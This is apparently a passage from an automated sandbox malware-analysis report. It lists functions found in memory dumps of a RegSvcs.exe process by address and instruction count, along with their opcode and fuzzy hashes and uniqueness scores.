Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
Instruction ID: 1df50f5c373b088414946138ea29c38dc0b3cb042b088d1f89f87e8c1b320748
Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
Instruction Fuzzy Hash: 78411C75A00605EFDB24CF98C990AAABBF8FF18B00F14896DE59AD7651D330EA44CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0199262C Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 776555e5bb0cd7df9d5adf321c72488a9c96445cf7b32ff037cc674d7a33a6dd
Instruction ID: f823fd9c3252d19278b4d3a1a8eac12024a9528e8ef2b25620722d60416c68de
Opcode Fuzzy Hash: 776555e5bb0cd7df9d5adf321c72488a9c96445cf7b32ff037cc674d7a33a6dd
Instruction Fuzzy Hash: 5641B071501701EFDB22EF2CC940A69B7F9FF85311F1485AAC50E9B6A1DB30A941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 019CC8F9 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efb3b2cbfa3d93fc1724cf9d9ab6ddf0947df1177b9e20fdf66f28f9d606ff00
Instruction ID: 76f798affd074158e370d2ef1912ae002444c0aa9a484147d23587060cf10e45
Opcode Fuzzy Hash: efb3b2cbfa3d93fc1724cf9d9ab6ddf0947df1177b9e20fdf66f28f9d606ff00
Instruction Fuzzy Hash: 603157B1A00345EFDB12CF98D440B99BBF4FB49B24F2185AED119EB291D3369902CB95

Uniqueness

Uniqueness Score: -1.00%

Function 01A107C3 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c812f91626b08a78a145ba6380c94eab460ea2cc0b9819800fb568686b8fc62
Instruction ID: 481483cc2c8cf44858dc1b1056f852e02c63802521d34741cc164ec72984a56e
Opcode Fuzzy Hash: 8c812f91626b08a78a145ba6380c94eab460ea2cc0b9819800fb568686b8fc62
Instruction Fuzzy Hash: D7416C719083019FD321DF69C845B9BBBE8FF88654F008A2EF99CD7251D7709945CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 019880A0 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bde58873e560d69057587adbf6a35b8c17ee89eb4ef7b9944d58a629e65d1dc5
Instruction ID: 1f592d6df760ad669993840ef417786208ce7e84c098de154f1fc1433eb3d4c1
Opcode Fuzzy Hash: bde58873e560d69057587adbf6a35b8c17ee89eb4ef7b9944d58a629e65d1dc5
Instruction Fuzzy Hash: 2241F271A04616EFDB11EF58C980AA8B7B5FF54760F908629D81EA7280DF34ED418BE0

Uniqueness

Uniqueness Score: -1.00%

Function 01A105A7 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 049031122fcd9699c545182f38df8c6bb86d86e3cde20817239719b554bc2d3e
Instruction ID: 34adedd13885a0900d913ce8f799ca792758ec9cebb0f74db504e2c403571d88
Opcode Fuzzy Hash: 049031122fcd9699c545182f38df8c6bb86d86e3cde20817239719b554bc2d3e
Instruction Fuzzy Hash: 1741F4726047429FC320DF6CD940A6AB7E9FFC8700F144A2DF99887684E730E944C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 01994859 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76bf027d9057285bf77bd59e8f37d00b85f7a7ca4141f7931ff828692c65792e
Instruction ID: 4d56079a6af6202aac70990ab41363753f597749646ae19e23b10a9cfd8caec2
Opcode Fuzzy Hash: 76bf027d9057285bf77bd59e8f37d00b85f7a7ca4141f7931ff828692c65792e
Instruction Fuzzy Hash: ED41D5306043028BDB26DF1CD984B2ABBEAFF80B55F14442DEA498B291D730D946CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01988B50 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35e5098bf0de558aa6c8a5946bf97b184376eaf5ffb5141ebef2b4416430e2d0
Instruction ID: 74208eca3b64cde60f9b33f954b7725a86a37a0e6d6481d5ec72748d8fa41cef
Opcode Fuzzy Hash: 35e5098bf0de558aa6c8a5946bf97b184376eaf5ffb5141ebef2b4416430e2d0
Instruction Fuzzy Hash: F2419271E01605DFCB15EF69C98099DB7F5FF88320F50852ED46EA7250D734A901CB60

Uniqueness

Uniqueness Score: -1.00%

Function 019A02E1 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
Instruction ID: efb6e219d1bd6dd3bef2acc92718e77c0677c7971ec2a8b423b14000c398a02d
Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
Instruction Fuzzy Hash: 1F310731A04244AFDB12CB6CCC44BEBBFE9AF54350F0845A5F45DD7352D6749888CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01A3E3DB Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d0e8ec96cba813fb641ae086aecf17e635fb0b2908a912ec9b4aa948f28b054
Instruction ID: dc7ec0965d9c4c59d8b2bbeb88dc7e75ba1b3015ce86a88bf13b0a26b15c2e4e
Opcode Fuzzy Hash: 1d0e8ec96cba813fb641ae086aecf17e635fb0b2908a912ec9b4aa948f28b054
Instruction Fuzzy Hash: 1A31A835750706ABD7229F658C81FAF76B9ABDDB50F100028F604AB391DAA5DD00C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 01A44B4B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c2bcbcba7964c3f20c12e12817a5bf56e8cdeef96740edd2335bfc6fe40872c
Instruction ID: 1daa5b1560bf268f0852ecb33c4471f28539eb1fd4eca11d1a7ee5b601dfabc6
Opcode Fuzzy Hash: 8c2bcbcba7964c3f20c12e12817a5bf56e8cdeef96740edd2335bfc6fe40872c
Instruction Fuzzy Hash: AD31C1726056018FD321DF19D880F2AB7F6FBC8360F09446DE9999B751DB30A806CB95

Uniqueness

Uniqueness Score: -1.00%

Function 01994260 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 612ff299633da81d1a68a331c6d9c5be24ba03fec09f74ecd70f9127a6a45daf
Instruction ID: 6471708b6548d174cf0bf0e7db20abf894653271ec8fe0372eb419935154da67
Opcode Fuzzy Hash: 612ff299633da81d1a68a331c6d9c5be24ba03fec09f74ecd70f9127a6a45daf
Instruction Fuzzy Hash: C6419E75200B45EFDB26CF28C981FDA7BE9AB85314F05882DE65D8B251D774E805CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01A44BB0 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8490d376b57a9db29dc0cb583982857c4dd9b92d407d0ba3430b4b059afeefe9
Instruction ID: df22929e60cd32d5df7cb8bfda263419293a67994fa4230512a7532dcd80b753
Opcode Fuzzy Hash: 8490d376b57a9db29dc0cb583982857c4dd9b92d407d0ba3430b4b059afeefe9
Instruction Fuzzy Hash: CE317A716047019FE320DF29C880B2AB7E5FBC8720F09496DE9999B791EB30EC05CB95

Uniqueness

Uniqueness Score: -1.00%

Function 01A0EB1D Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a41602242f4edb4a53f4ed587d04bf471befc176f0c9f9f7247cb5f12a56809
Instruction ID: 87f076c39c5591e55288dbeceeef02b6d16ccfb0f8edf678dbf7dce07f3365c2
Opcode Fuzzy Hash: 9a41602242f4edb4a53f4ed587d04bf471befc176f0c9f9f7247cb5f12a56809
Instruction Fuzzy Hash: 0931D972701A82DBF327575DDD48F25BBD8BF82744F1D48A0AB45976D1DB28DC80D2A0

Uniqueness

Uniqueness Score: -1.00%

Function 01A561C3 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dc6e9bd41c3f14f5832b39c8b83cb4bfb5f5bff171a1679e87b6a7584afa4f4
Instruction ID: e36ad719ffa156a7bb1564c6a59ddc6c756b21d9238537b98d5add96f03c12ac
Opcode Fuzzy Hash: 8dc6e9bd41c3f14f5832b39c8b83cb4bfb5f5bff171a1679e87b6a7584afa4f4
Instruction Fuzzy Hash: 5A31C175E0021AABDB15DF98CC40FAEB7B5FB44B80F858168E908AB244D770ED41CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01A3483A Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0d34fff341da86427384303ed02ff807bd2305febdba696d3fb4a51871a6504
Instruction ID: 983afb36402d0df3ceab5ba77108416ee8ddaf3e6a4ead76abd377c6f0944e35
Opcode Fuzzy Hash: a0d34fff341da86427384303ed02ff807bd2305febdba696d3fb4a51871a6504
Instruction Fuzzy Hash: 96315276A4012DABCF21DF54DD84BDEBBB5ABD8310F1040A5B508E7250CA30DE918F90

Uniqueness

Uniqueness Score: -1.00%

Function 019BEB20 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edbad07aa505997568be1e4dcdd77c4c61fbe0bf9783a2f3c17c25359b950c9f
Instruction ID: 8ab15881b7421a758efe7b4ebec78800213788e1c952f8637d675ec7236dbae3
Opcode Fuzzy Hash: edbad07aa505997568be1e4dcdd77c4c61fbe0bf9783a2f3c17c25359b950c9f
Instruction Fuzzy Hash: 5E318676E10229BFDB21DFA9C980AEEBBFDEF44750F114465E519D7250D6709A008BA0

Uniqueness

Uniqueness Score: -1.00%

Function 01A560B8 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9130ec1ca5f62f53b0d9fd526634f3fc44c829f9637db76ffdfc1c5c4375b53f
Instruction ID: b068a782e5ca9b94417de458a47ef4562ea7644c72b596085dc66d174d077c40
Opcode Fuzzy Hash: 9130ec1ca5f62f53b0d9fd526634f3fc44c829f9637db76ffdfc1c5c4375b53f
Instruction Fuzzy Hash: 1031C071B04706ABDB22ABA9C850B7AB7B9BF84754F444069E909DB352DA70DD018B90

Uniqueness

Uniqueness Score: -1.00%

Function 019907AF Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71b93380035966acc73eac4507cf34f8e08136b27a8dd2ba59176469789c9871
Instruction ID: e193b4848afbd161d0aebc3cf15a57b81ca15b44c41e1250998ffbda7a47a054
Opcode Fuzzy Hash: 71b93380035966acc73eac4507cf34f8e08136b27a8dd2ba59176469789c9871
Instruction Fuzzy Hash: 7F31C432B04616DBCB12DE2D8880D6BBBADAFD4650F094529FD6D9B210DA31DC1187E2

Uniqueness

Uniqueness Score: -1.00%

Function 01998550 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc17a7188b7fa62cdf2b0d04ecbaf619fade722bebf8a9d85604be67e97a8872
Instruction ID: fae737a8351ff0ce4c75cea2fc05528127375eb6d38c67329ed016ce92395f25
Opcode Fuzzy Hash: bc17a7188b7fa62cdf2b0d04ecbaf619fade722bebf8a9d85604be67e97a8872
Instruction Fuzzy Hash: E93161726053019FE720CF1DC940B5ABBE9FB98710F19496DEA8897391D771E848CB92

Uniqueness

Uniqueness Score: -1.00%

Function 019CA6C7 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
Instruction ID: 269faa30095e56e80946c3e3c85598b12a886f930626af0127fc87492ce32bea
Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
Instruction Fuzzy Hash: 303126B2B00B05AFE761CF69DE40B57BBF8BB48B50F14492DA59EC3651F630E9008B61

Uniqueness

Uniqueness Score: -1.00%

Function 01A3EBD0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9123528383fc78874409b34fb2a64038478dce2f810d5bda4052e4d59a1ff5f
Instruction ID: 82be47f05e9e5a9c6b816376fff5757b41383cd8ded34046283ddeb81632cb9e
Opcode Fuzzy Hash: e9123528383fc78874409b34fb2a64038478dce2f810d5bda4052e4d59a1ff5f
Instruction Fuzzy Hash: ED317A715093419FCB11EF19C540A6ABBF1FFC9614F4449AEF488AB251E331D94ACBD2

Uniqueness

Uniqueness Score: -1.00%

Function 019B438F Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 947bce6f1c287311a3f917648896551af4c12e7e76eb5647958738489c8579a8
Instruction ID: 65b13c38037faa6706adfef1fa66e111ca701f76027b958bea9f18c923fd5867
Opcode Fuzzy Hash: 947bce6f1c287311a3f917648896551af4c12e7e76eb5647958738489c8579a8
Instruction Fuzzy Hash: CB31D431B002069FD720DFA8CAC0AAEBBFABB84704F008529D64FD7695D734E945DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0198CB7E Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
Instruction ID: 5e0708ce55c39a4176e899ffe4753b7fd17cb70e7134d945f654117fd2539b8e
Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
Instruction Fuzzy Hash: 0121E936E4065AAAD711DBB9C841BEFBBB9AF54740F0584359E59E7350E270D90087A0

Uniqueness

Uniqueness Score: -1.00%

Function 0198C156 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5d34fe6689e44cf14bb70266271f0b7e0f8c41dafda198f589875e6b435ca99
Instruction ID: 8778a27e61927b1a12f0c4614554704668c3491c8c0c0ade9c5649ab531085f3
Opcode Fuzzy Hash: d5d34fe6689e44cf14bb70266271f0b7e0f8c41dafda198f589875e6b435ca99
Instruction Fuzzy Hash: DD317DB15002019BDB32AF58CC45B6977F8FF90704F44C1A9DD8D9B382EA35D986CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01A4C3CD Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
Instruction ID: 9857b642009df3cef73164486e3eb3b5dd06f0a0a7d0781b28ad3cfd537faea7
Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
Instruction Fuzzy Hash: 3A212B3A601652B7DB15AB958D04ABABBB5EFD0721F40801AFB9D87693F634D940C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 0198E420 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0898bef2f3856d83e5b1edfbca2384c0370d23d2ec98604a0c1946fb9fa72bda
Instruction ID: 7e0e67b5c21d9b4d3868fc166acfc35bc4618a47f1139c942ee6ac1dd1bf30b3
Opcode Fuzzy Hash: 0898bef2f3856d83e5b1edfbca2384c0370d23d2ec98604a0c1946fb9fa72bda
Instruction Fuzzy Hash: EF31F931A0012CABDB31EF28CC51FEEB7B9EB55B40F0104A1E64DA7290D6749E84CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 019C4588 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
Instruction ID: d55b43d9fc2e78a5ee7accc5b1401ad671b4d7543d1a114173d01017f88d51af
Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
Instruction Fuzzy Hash: B5217131B00609EBCB15CF58CA94A8EBBB9FF48B14F10C069EE599B245D671EA058B91

Uniqueness

Uniqueness Score: -1.00%

Function 019C44B0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf7e6afd641765117b0c4e67e401ca3f9a38c0003bb783a6d534550a1b2dfb6e
Instruction ID: b5515041d58570dfc6ebfd18b595a4644a08cd7427d37924996840c1c2da4fc7
Opcode Fuzzy Hash: cf7e6afd641765117b0c4e67e401ca3f9a38c0003bb783a6d534550a1b2dfb6e
Instruction Fuzzy Hash: 6921B4726047459FCB22CF18C890B6B77E4FF98B60F01451DFD989B641D730D9018BA2

Uniqueness

Uniqueness Score: -1.00%

Function 0198E388 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
Instruction ID: a890b21739560571827b186e401ad2f563ad4d1d2d09b5df2eebeccdb7bd164b
Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
Instruction Fuzzy Hash: D7318731600604EFE721DBA8C994F6AB7F9FF85354F1049A9E55ACB280E730EE02CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01A0E609 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672fa0bc02a4695819a35ee071472ba8f7eb0412edfe118f57d780018c998148
Instruction ID: 4e2607a48380f325e089cb627804a9a1157917d7c38d5504bf5f1eb78deb5318
Opcode Fuzzy Hash: 672fa0bc02a4695819a35ee071472ba8f7eb0412edfe118f57d780018c998148
Instruction Fuzzy Hash: 3631A079A00205DFDB19CF1CE8949AEB7B5FF84304F194859F84A9B391EB71EA50CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00417287 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5011ab174a604654e69379bcaecd2ae7ec0f653b52f2fcc6e7bcde01a270f6ed
Instruction ID: d85fdf142ac7275ba74890bfe4a6589b856f57c7f22e4b166bf3d20673664fcb
Opcode Fuzzy Hash: 5011ab174a604654e69379bcaecd2ae7ec0f653b52f2fcc6e7bcde01a270f6ed
Instruction Fuzzy Hash: 3C11BAB168D16B8BE703CD7D9C024F5BBE0E24325171811BBC885EF68AC621E08BC6C0

Uniqueness

Uniqueness Score: -1.00%

Function 01A106F1 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2144b1fda8696b214a51c40341304e3df95e3b0acb77e94f2817b7813b78bf0a
Instruction ID: b832f287c3915eb61a1e2c3b6621b186f7fab3073991d738434b21a6da5a976f
Opcode Fuzzy Hash: 2144b1fda8696b214a51c40341304e3df95e3b0acb77e94f2817b7813b78bf0a
Instruction Fuzzy Hash: 2C21BF75A00629ABCF20DF59C981ABEB7F4FF48740B544069F945BB254D738AD42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01A1019F Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dcba96f361c7513c0c0e520852de322b23fd51d73912dc6c53a0242a01fdee6
Instruction ID: 20d887ef502ac071115fca6a1d87b5fe767d4911912032cf17ff291bfc756608
Opcode Fuzzy Hash: 7dcba96f361c7513c0c0e520852de322b23fd51d73912dc6c53a0242a01fdee6
Instruction Fuzzy Hash: A821AB71A00605AFD715DBA9C940A6AB7B8FF98740F144069FA48D76A0E638ED40CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01A10283 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c92652509d21c463b39ec73fc8917420ba5744e2b3f7df2982f2c4019c52c34
Instruction ID: c7b36360c74237537078d7cf59d0963f7cacd60c66ce686f9b53219dad8408ef
Opcode Fuzzy Hash: 6c92652509d21c463b39ec73fc8917420ba5744e2b3f7df2982f2c4019c52c34
Instruction Fuzzy Hash: 0F21C2729043469FD711EF69CA48B9BFBECBFE0240F084456BE84C7255D734DA88C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 019B2835 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4816f137dff26d2b78247886e3b89413ca34257d7242fd034296b2b68059a7
Instruction ID: 5b7dc46a207f33a0a02129bc0f3406386e3fe30cef11df8376762ff883ab28f4
